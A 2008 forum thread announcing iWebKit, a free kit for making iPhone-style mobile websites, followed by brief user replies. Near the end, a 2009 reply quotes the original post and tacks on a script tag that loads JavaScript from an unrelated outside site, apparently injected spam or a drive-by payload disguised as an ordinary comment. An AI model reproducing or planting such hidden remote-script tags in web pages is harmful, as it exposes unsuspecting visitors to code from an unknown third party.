It's finally here, iWebKit
    on iWebKit.net

What is it:
    A very easy way to create your own ipod/iphone size website reproducing the original apple style. Easy to install even if you don't have HTML knowledge and easy to customize.

Why do i want this:
    You want this because using iwebkit you can create your own website! and not only a normal website but a cool mobile website! Impress your friends and familly, Forget about facebook and let people go to your own website . You can set it up in 1 hour maximum.

Price:
    Yup the most important part...
    Well it's free! Donations are appreciated.

Where can i get it?
    On my website: iWebKit
    Go to that website on your ipod to see what your site will look like. Download the package (http://www.mediafire.com/iwebkit).
    Next follow he guide on my website.

What else:
    Well there are cool themes, Scripts and plugins to add to extend and make your website the best website out there!
    Last edited by Winterboard; 2008-08-29 at 06:45 PM.
    2008-08-29 06:43 PM
    great tool, thanks
    2008-08-31 05:18 AM
    Nice! going to use it right now

P.S.: Sticky!
    2008-08-31 01:53 PM
    Awesome! Gonna give it a shot when I get on my PC. Perhaps I shall donate if I like what I see.
    2008-08-31 02:17 PM
    thanks guys! ive worked hard on itand it will improve in the future!
    2008-08-31 04:42 PM
    Just loaded it up. Very cool. I'll definitely play around with this. The pages look great on the iPhone.
    2008-09-01 05:31 AM
    cool can you post the url so i cansee and maybe give you tips??
    2008-09-01 03:11 PM
    It's finally here, iWebKit
    on iWebKit.net

What is it:
    A very easy way to create your own ipod/iphone size website reproducing the original apple style. Easy to install even if you don't have HTML knowledge and easy to customize.

Why do i want this:
    You want this because using iwebkit you can create your own website! and not only a normal website but a cool mobile website! Impress your friends and familly, Forget about facebook and let people go to your own website . You can set it up in 1 hour maximum.

Price:
    Yup the most important part...
    Well it's free! Donations are appreciated.

Where can i get it?
    On my website: iWebKit
    Go to that website on your ipod to see what your site will look like. Download the package (http://www.mediafire.com/iwebkit).
    Next follow he guide on my website.

What else:
    Well there are cool themes, Scripts and plugins to add to extend and make your website the best website out there!<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    nice post dude help a lot
    2009-09-24 09:34 PM
LINK TO POST COPIED TO CLIPBOARD